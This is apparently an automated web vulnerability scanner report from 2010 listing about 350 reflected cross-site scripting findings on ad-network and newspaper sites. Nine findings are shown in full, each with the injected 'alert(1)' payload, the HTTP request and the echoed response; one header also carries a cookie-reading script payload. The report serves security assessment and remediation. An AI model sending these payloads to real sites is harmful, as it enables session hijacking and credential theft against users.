1.303. http://www.sitebrand.com/wp-content/plugins/tabbed-widgets/tabbed-widgets.php [REST URL parameter 1]

1.304. http://www.sitebrand.com/wp-content/plugins/tabbed-widgets/tabbed-widgets.php [REST URL parameter 2]

1.305. http://www.sitebrand.com/wp-content/plugins/tabbed-widgets/tabbed-widgets.php [REST URL parameter 3]

1.306. http://www.sitebrand.com/wp-content/plugins/tabbed-widgets/tabbed-widgets.php [REST URL parameter 4]

1.307. http://www.sitebrand.com/wp-content/themes/DropdownMenuVersion/purecorpwp/pagenavi-css.css [REST URL parameter 1]

1.308. http://www.sitebrand.com/wp-content/themes/DropdownMenuVersion/purecorpwp/pagenavi-css.css [REST URL parameter 2]

1.309. http://www.sitebrand.com/wp-content/themes/DropdownMenuVersion/purecorpwp/pagenavi-css.css [REST URL parameter 3]

1.310. http://www.sitebrand.com/wp-content/themes/DropdownMenuVersion/purecorpwp/pagenavi-css.css [REST URL parameter 4]

1.311. http://www.sitebrand.com/wp-content/themes/DropdownMenuVersion/purecorpwp/pagenavi-css.css [REST URL parameter 5]

1.312. http://www.sitebrand.com/wp-includes/js/jquery/jquery.form.js [REST URL parameter 1]

1.313. http://www.sitebrand.com/wp-includes/js/jquery/jquery.form.js [REST URL parameter 2]

1.314. http://www.sitebrand.com/wp-includes/js/jquery/jquery.form.js [REST URL parameter 3]

1.315. http://www.sitebrand.com/wp-includes/js/jquery/jquery.form.js [REST URL parameter 4]

1.316. http://www.sitebrand.com/wp-includes/js/jquery/jquery.js [REST URL parameter 1]

1.317. http://www.sitebrand.com/wp-includes/js/jquery/jquery.js [REST URL parameter 2]

1.318. http://www.sitebrand.com/wp-includes/js/jquery/jquery.js [REST URL parameter 3]

1.319. http://www.sitebrand.com/wp-includes/js/jquery/jquery.js [REST URL parameter 4]

1.320. http://www.sitebrand.com/wp-includes/js/jquery/ui.core.js [REST URL parameter 1]

1.321. http://www.sitebrand.com/wp-includes/js/jquery/ui.core.js [REST URL parameter 2]

1.322. http://www.sitebrand.com/wp-includes/js/jquery/ui.core.js [REST URL parameter 3]

1.323. http://www.sitebrand.com/wp-includes/js/jquery/ui.core.js [REST URL parameter 4]

1.324. http://www.sitebrand.com/wp-includes/js/jquery/ui.tabs.js [REST URL parameter 1]

1.325. http://www.sitebrand.com/wp-includes/js/jquery/ui.tabs.js [REST URL parameter 2]

1.326. http://www.sitebrand.com/wp-includes/js/jquery/ui.tabs.js [REST URL parameter 3]

1.327. http://www.sitebrand.com/wp-includes/js/jquery/ui.tabs.js [REST URL parameter 4]

1.328. http://www.sitebrand.com/xmlrpc.php [REST URL parameter 1]

1.329. http://bs.serving-sys.com.47127.9349.302br.net/jss/BurstingPipe/adServer.bs [Referer HTTP header]

1.330. http://medienfreunde.com/lab/innerfade/ [Referer HTTP header]

1.331. https://secure.nypost.com/homedelivery/signup.htm [Referer HTTP header]

1.332. https://webid2.gs.com/cgi-bin/10kw/login.cgi [Referer HTTP header]

1.333. http://www.addthis.com/bookmark.php [Referer HTTP header]

1.334. http://www.addthis.com/bookmark.php [Referer HTTP header]

1.335. http://www.adoutput.com/version2/hit_rm.cfm [User-Agent HTTP header]

1.336. http://www.mysite.com/x/y/MyPage.asp [Referer HTTP header]

1.337. http://www.quantcast.com/p-e4QUTcIS3_f12 [Referer HTTP header]

1.338. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]

1.339. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]

1.340. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

1.341. http://ar.voicefive.com/bmx3/broker.pli [ar_p43112268 cookie]

1.342. http://ar.voicefive.com/bmx3/broker.pli [ar_p68511049 cookie]

1.343. http://ar.voicefive.com/bmx3/broker.pli [ar_p71955200 cookie]

1.344. http://ar.voicefive.com/bmx3/broker.pli [ar_p72205782 cookie]

1.345. http://hire.jobvite.com/CompanyJobs/Careers.aspx [guestidc cookie]

1.346. http://k.collective-media.net/cmadj/cm.ny_post/tier2_082410 [cli cookie]

1.347. http://tag.admeld.com/ad/iframe/14/nypost/728x90/above-fold [meld_sess cookie]

1.348. http://www.indeed.com/pagead/clk [atk parameter]

1.349. http://www.indeed.com/pagead/clk [name of an arbitrarily supplied request parameter]

1.350. http://www.indeed.com/pagead/clk [p parameter]



1. Cross-site scripting (reflected)
There are 350 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://a.collective-media.net/adj/cm.ny_post/tier2_082410 [REST URL parameter 2]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.ny_post/tier2_082410

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d77bf'-alert(1)-'ceefda2404d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.ny_postd77bf'-alert(1)-'ceefda2404d/tier2_082410 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dal-dc; bkdp=1; blue=1; apnx=1; qcms=1; JY57=3kLv9HAF1oij2HK9QoO88ruPVtS-4jU-0EtAlYwrF4689JWJDCrmEww; cli=11bbcecf1d09b9d; nadp=1; mmpg=1; targ=1; gce=1; qcdp=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 425
Date: Fri, 26 Nov 2010 20:42:17 GMT
Connection: close
Set-Cookie: dc=dal-dc; domain=collective-media.net; path=/; expires=Sun, 26-Dec-2010 20:42:17 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.ny_postd77bf'-alert(1)-'ceefda2404d/tier2_082410;net=cm;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.2. http://a.collective-media.net/adj/cm.ny_post/tier2_082410 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.ny_post/tier2_082410

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b5517'-alert(1)-'a705b220f40 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.ny_post/tier2_082410b5517'-alert(1)-'a705b220f40 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dal-dc; bkdp=1; blue=1; apnx=1; qcms=1; JY57=3kLv9HAF1oij2HK9QoO88ruPVtS-4jU-0EtAlYwrF4689JWJDCrmEww; cli=11bbcecf1d09b9d; nadp=1; mmpg=1; targ=1; gce=1; qcdp=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 425
Date: Fri, 26 Nov 2010 20:42:17 GMT
Connection: close
Set-Cookie: dc=dal-dc; domain=collective-media.net; path=/; expires=Sun, 26-Dec-2010 20:42:17 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.ny_post/tier2_082410b5517'-alert(1)-'a705b220f40;net=cm;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.3. http://a.collective-media.net/adj/cm.ny_post/tier2_082410 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.ny_post/tier2_082410

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a584c'-alert(1)-'2281f760d0a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.ny_post/tier2_082410?a584c'-alert(1)-'2281f760d0a=1 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dal-dc; bkdp=1; blue=1; apnx=1; qcms=1; JY57=3kLv9HAF1oij2HK9QoO88ruPVtS-4jU-0EtAlYwrF4689JWJDCrmEww; cli=11bbcecf1d09b9d; nadp=1; mmpg=1; targ=1; gce=1; qcdp=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 428
Date: Fri, 26 Nov 2010 20:42:17 GMT
Connection: close
Set-Cookie: dc=dal-dc; domain=collective-media.net; path=/; expires=Sun, 26-Dec-2010 20:42:17 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.ny_post/tier2_082410?a584c'-alert(1)-'2281f760d0a=1;net=cm;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.4. http://a.collective-media.net/adj/cm.ny_post/tier2_082410 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.ny_post/tier2_082410

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b7ce'-alert(1)-'ff9a7dd6ec was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.ny_post/tier2_082410;sz=728x90;ord=1290802981?1b7ce'-alert(1)-'ff9a7dd6ec HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/14/nypost/728x90/above-fold?t=1290806121370&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.nypost.com%2Fpartners%2Foodle%2Fhead_general.htm&refer=http%3A%2F%2Fwww.classifieds.nypost.com%2Fhousing%2Frent8f319%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E753c6886db6%2Fapartment%2F
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11bbcecf1d09b9d; bkdp=1; gce=1; JY57=3kLv9HAF1oij2HK9QoO88ruPVtS-4jU-0EtAlYwrF4689JWJDCrmEww; apnx=1; nadp=1; qcdp=1; qcms=1; blue=1; dc=dal-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 450
Date: Fri, 26 Nov 2010 20:46:51 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dal-dc; domain=collective-media.net; path=/; expires=Sun, 26-Dec-2010 20:46:51 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.ny_post/tier2_082410;sz=728x90;net=cm;ord=1290802981?1b7ce'-alert(1)-'ff9a7dd6ec;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.5. http://ad.vulnerable.ad.partner/adi/N4492.128431.5493870214421/B4140786.16 [_a parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N4492.128431.5493870214421/B4140786.16

Issue detail

The value of the _a request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 324a9"-alert(1)-"51cac44738e was submitted in the _a parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4492.128431.5493870214421/B4140786.16;sz=728x90;click=http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5e/f/a0/%2a/r%3B232206941%3B0-0%3B0%3B56079867%3B3454-728/90%3B39181458/39199245/1%3Bu%3D1781348%3B%7Esscs%3D%3fhttp://bidnw.ru4.com/bclick?_f=ce291fba-8377-40c2-b6eb-48cac875a729&_o=15599&_eo=97957&_et=1290802687&_a=1632141324a9"-alert(1)-"51cac44738e&_s=0&_d=1724823&_pm=97957&_pn=1781348&redirect=;ord=4059731? HTTP/1.1
Host: ad.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|996458/539608/14939,951243/666896/14938,642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6993
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 26 Nov 2010 20:48:26 GMT
Expires: Fri, 26 Nov 2010 20:48:26 GMT
Connection: close

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
41%3B0-0%3B0%3B56079867%3B3454-728/90%3B39181458/39199245/1%3Bu%3D1781348%3B%7Esscs%3D%3fhttp://bidnw.ru4.com/bclick?_f=ce291fba-8377-40c2-b6eb-48cac875a729&_o=15599&_eo=97957&_et=1290802687&_a=1632141324a9"-alert(1)-"51cac44738e&_s=0&_d=1724823&_pm=97957&_pn=1781348&redirect=http://www.progressive.com/insurance/cre/scoreboard-display.aspx?&code=9903600269");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "o
...[SNIP]...

1.6. http://ad.vulnerable.ad.partner/adi/N4492.128431.5493870214421/B4140786.16 [_d parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N4492.128431.5493870214421/B4140786.16

Issue detail

The value of the _d request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15e7d"-alert(1)-"f07b9d6f0c7 was submitted in the _d parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4492.128431.5493870214421/B4140786.16;sz=728x90;click=http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5e/f/a0/%2a/r%3B232206941%3B0-0%3B0%3B56079867%3B3454-728/90%3B39181458/39199245/1%3Bu%3D1781348%3B%7Esscs%3D%3fhttp://bidnw.ru4.com/bclick?_f=ce291fba-8377-40c2-b6eb-48cac875a729&_o=15599&_eo=97957&_et=1290802687&_a=1632141&_s=0&_d=172482315e7d"-alert(1)-"f07b9d6f0c7&_pm=97957&_pn=1781348&redirect=;ord=4059731? HTTP/1.1
Host: ad.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|996458/539608/14939,951243/666896/14938,642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6993
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 26 Nov 2010 20:48:31 GMT
Expires: Fri, 26 Nov 2010 20:48:31 GMT
Connection: close

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
6079867%3B3454-728/90%3B39181458/39199245/1%3Bu%3D1781348%3B%7Esscs%3D%3fhttp://bidnw.ru4.com/bclick?_f=ce291fba-8377-40c2-b6eb-48cac875a729&_o=15599&_eo=97957&_et=1290802687&_a=1632141&_s=0&_d=172482315e7d"-alert(1)-"f07b9d6f0c7&_pm=97957&_pn=1781348&redirect=http://www.progressive.com/insurance/cre/scoreboard-display.aspx?&code=9903600269");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg
...[SNIP]...

1.7. http://ad.vulnerable.ad.partner/adi/N4492.128431.5493870214421/B4140786.16 [_eo parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N4492.128431.5493870214421/B4140786.16

Issue detail

The value of the _eo request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75b16"-alert(1)-"6269292a7b5 was submitted in the _eo parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4492.128431.5493870214421/B4140786.16;sz=728x90;click=http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5e/f/a0/%2a/r%3B232206941%3B0-0%3B0%3B56079867%3B3454-728/90%3B39181458/39199245/1%3Bu%3D1781348%3B%7Esscs%3D%3fhttp://bidnw.ru4.com/bclick?_f=ce291fba-8377-40c2-b6eb-48cac875a729&_o=15599&_eo=9795775b16"-alert(1)-"6269292a7b5&_et=1290802687&_a=1632141&_s=0&_d=1724823&_pm=97957&_pn=1781348&redirect=;ord=4059731? HTTP/1.1
Host: ad.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|996458/539608/14939,951243/666896/14938,642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7023
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 26 Nov 2010 20:48:20 GMT
Expires: Fri, 26 Nov 2010 20:48:20 GMT
Connection: close

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
/3a5e/f/a0/%2a/r%3B232206941%3B0-0%3B0%3B56079867%3B3454-728/90%3B39181458/39199245/1%3Bu%3D1781348%3B%7Esscs%3D%3fhttp://bidnw.ru4.com/bclick?_f=ce291fba-8377-40c2-b6eb-48cac875a729&_o=15599&_eo=9795775b16"-alert(1)-"6269292a7b5&_et=1290802687&_a=1632141&_s=0&_d=1724823&_pm=97957&_pn=1781348&redirect=http://www.progressive.com/insurance/savings-plus/price-and-service.aspx?&code=9903600204");
var fscUrl = url;
var fscUrlClic
...[SNIP]...

1.8. http://ad.vulnerable.ad.partner/adi/N4492.128431.5493870214421/B4140786.16 [_et parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N4492.128431.5493870214421/B4140786.16

Issue detail

The value of the _et request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db7a3"-alert(1)-"83ac384fb94 was submitted in the _et parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4492.128431.5493870214421/B4140786.16;sz=728x90;click=http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5e/f/a0/%2a/r%3B232206941%3B0-0%3B0%3B56079867%3B3454-728/90%3B39181458/39199245/1%3Bu%3D1781348%3B%7Esscs%3D%3fhttp://bidnw.ru4.com/bclick?_f=ce291fba-8377-40c2-b6eb-48cac875a729&_o=15599&_eo=97957&_et=1290802687db7a3"-alert(1)-"83ac384fb94&_a=1632141&_s=0&_d=1724823&_pm=97957&_pn=1781348&redirect=;ord=4059731? HTTP/1.1
Host: ad.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|996458/539608/14939,951243/666896/14938,642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6993
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 26 Nov 2010 20:48:22 GMT
Expires: Fri, 26 Nov 2010 20:48:22 GMT
Connection: close

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
r%3B232206941%3B0-0%3B0%3B56079867%3B3454-728/90%3B39181458/39199245/1%3Bu%3D1781348%3B%7Esscs%3D%3fhttp://bidnw.ru4.com/bclick?_f=ce291fba-8377-40c2-b6eb-48cac875a729&_o=15599&_eo=97957&_et=1290802687db7a3"-alert(1)-"83ac384fb94&_a=1632141&_s=0&_d=1724823&_pm=97957&_pn=1781348&redirect=http://www.progressive.com/insurance/cre/scoreboard-display.aspx?&code=9903600269");
var fscUrl = url;
var fscUrlClickTagFound = false;
var
...[SNIP]...

1.9. http://ad.vulnerable.ad.partner/adi/N4492.128431.5493870214421/B4140786.16 [_o parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N4492.128431.5493870214421/B4140786.16

Issue detail

The value of the _o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30be3"-alert(1)-"9f1762bff76 was submitted in the _o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4492.128431.5493870214421/B4140786.16;sz=728x90;click=http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5e/f/a0/%2a/r%3B232206941%3B0-0%3B0%3B56079867%3B3454-728/90%3B39181458/39199245/1%3Bu%3D1781348%3B%7Esscs%3D%3fhttp://bidnw.ru4.com/bclick?_f=ce291fba-8377-40c2-b6eb-48cac875a729&_o=1559930be3"-alert(1)-"9f1762bff76&_eo=97957&_et=1290802687&_a=1632141&_s=0&_d=1724823&_pm=97957&_pn=1781348&redirect=;ord=4059731? HTTP/1.1
Host: ad.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=228ef07ef3000058|996458/539608/14939,951243/666896/14938,642050/658692/14936,685973/842351/14935,2587594/905577/14935,2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2199899/552974/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6993
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 26 Nov 2010 20:48:18 GMT
Expires: Fri, 26 Nov 2010 20:48:18 GMT
Connection: close

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
k%3Bh%3Dv8/3a5e/f/a0/%2a/r%3B232206941%3B0-0%3B0%3B56079867%3B3454-728/90%3B39181458/39199245/1%3Bu%3D1781348%3B%7Esscs%3D%3fhttp://bidnw.ru4.com/bclick?_f=ce291fba-8377-40c2-b6eb-48cac875a729&_o=1559930be3"-alert(1)-"9f1762bff76&_eo=97957&_et=1290802687&_a=1632141&_s=0&_d=1724823&_pm=97957&_pn=1781348&redirect=http://www.progressive.com/insurance/cre/scoreboard-display.aspx?&code=9903600269");
var fscUrl = url;
var fscUrlCl
...[SNIP]...

